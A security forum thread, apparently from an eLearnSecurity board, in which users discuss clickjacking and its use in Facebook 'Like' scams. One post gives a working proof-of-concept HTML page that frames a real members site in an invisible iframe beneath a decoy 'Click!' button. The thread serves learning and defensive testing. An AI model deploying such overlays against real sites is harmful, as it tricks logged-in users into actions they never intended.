Jump to content
Sign in to follow this  
robertray

clickjacking test page

Recommended Posts

gcooke

That's an interesting looking exploit. When I'm back in my office tomorrow I may have to point it at one of the sites on my server and I'll post up some results for you to let you know if it works or not. Though can't say I have heard of click jacking, what exactly does it do/hurt on the site?

Share this post


Link to post
gcooke

Well that is nifty... I have a few clients that my security firm works with I'll have to try this on who are venturing much more into online business with the way they receive personal information.

Share this post


Link to post
robertray

Looking forward to hearing about your results.

Share this post


Link to post
Armando

Clickjacking is another "feature" of HTML/HTTP that turns intoa vuln if abused. (Like CSRF although completely different).

It's being used in many Facebook malwares and scams nowadays. You know the Like button? ;)

Share this post


Link to post
robertray

The use of the like button and facebook is sometimes odd. Not always sure what people think it means, they just hit it. Social media opens up a whole now world of access to abuse.

Share this post


Link to post
gcooke

The use of the like button and facebook is sometimes odd. Not always sure what people think it means, they just hit it. Social media opens up a whole now world of access to abuse.

Yeah Social Media is both a blessing and a curse at times. Opens it self up for a lot of harm to be done to people who don't really understand what is going on around them as well as connecting people across the world.

Share this post


Link to post
gcooke

Played around with it some. Clearly my old website was never coded to block this type of attack.

http://mystechconsulting.com/clickjack/clickjack.html

I'm a bit curious about this since I do work with a lot of companies who use websites for a main source of leads and sales. I see how it works as an iframe, but I'm curious what it can do with a pop window type set up where the contact form pops up on a new window with no address bar to try and be more secure, (least that was the reason a few of my clients gave me for having it done that way) if you could still jack it as easy without someone seeing it or if it has to be embedded in an iframe? I might just play around with this code some over the next few days if I can clear my plate.

Share this post


Link to post
Armando

Looks like your tests would be interesting to be included in our upcoming web app security project ;)

Share this post


Link to post
icic21

Try this simple example...it's only proof of concept...

1) Login to https://members.elearnsecurity.com/home.php

2) Create this file test.html:

<html>

<title>Test</title>

<head>

<style>

span.button1{background-color:red;font-weight:bold;font-size:12px;

position:absolute;top:79px;left:1170px;z-index:-10}

iframe.test{opacity:0;filter:alpha(opacity=0)}

</style>

</head>

<body>

<br>

<iframe id="test" class="test" width="100%" height="100%" scrolling=no src="https://members.elearnsecurity.com/home.php"></iframe>

<span class="button1"><blink> Click! </blink></span>

</body>

</html>

3) Open test.html and click on "Click!"

It's a stupid example...But I think that you do understand. I don't think is a real vulnerability .... some say that the nature of the web ... (html, JavaScript, browsers ... etc)....Or rather it is a vulnerability ... but it is the fault of the nature of the WEB if there is ...

Share this post


Link to post
Armando

That's why you were loggin in so many times recently.

We watch you :lol:

Share this post


Link to post
icic21

That's why you were loggin in so many times recently.

We watch you :lol:

:rolleyes:

...I feel observed... :P

ElearnSecurity Big Brother... :o

Share this post


Link to post

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now
Sign in to follow this  
×